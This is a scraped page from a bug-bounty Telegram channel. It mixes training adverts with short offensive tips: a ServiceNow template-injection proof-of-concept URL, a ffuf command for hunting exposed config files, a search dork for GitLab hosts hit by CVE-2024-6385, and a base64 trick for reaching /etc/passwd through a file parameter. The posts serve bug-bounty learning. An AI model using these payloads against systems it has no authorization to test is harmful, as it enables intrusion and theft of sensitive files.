Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Brut Security pinned Β«πŸ“£Understanding Bug Bounty Hunting for NewcomersπŸ“£ 🎁Bug bounty hunting can seem appealing, but it’s important to know: πŸ–±High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»
⚠️Template Injection on ServiceNow by @assetnote⚠️

πŸ“ŒPoC:
http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>


😬 https://assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data

πŸ”–#bugbounty #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❀1πŸ‘1
πŸ’₯Last Week to Enroll for July Batch
▢️https://wa.link/7j7p6g
Please open Telegram to view this post
VIEW IN TELEGRAM
🀣🀣 Brother doing hardcore to get a bounty
🐳5πŸ”₯2❀1
πŸ’ƒ New Bug Bounty Target - https://tovawald.com/.well-known/security.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯2
β˜„οΈSensitive Information Disclosure Through Config Fileβ˜„οΈ

⚠️Steps To Reproduce:
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt


⚠️Wordlists:
πŸ”—https://github.com/six2dez/OneListForAll
πŸ”—https://wordlists.assetnote.io/
πŸ”—https://github.com/danielmiessler/SecLists
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯5
πŸ”₯2
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating πŸ”₯

The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/HvsUY
πŸ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef

Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
IDOR.pdf
78.5 KB
πŸ‘1
Brut Security pinned «Keep Checking Old Posts 🍿»
Is X Bug Bounty Community
Anonymous Poll
38%
Toxic
62%
Great
url/?f=etc/passwd ==> 403
encode etc/passwd as base64

url/?f=L2V0Yy9wYXNzd2Q= ==> 200

#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...

By:@GodfatherOrwa

#bugbountytips #BugBounty
πŸ‘10πŸ”₯2πŸ€”2❀1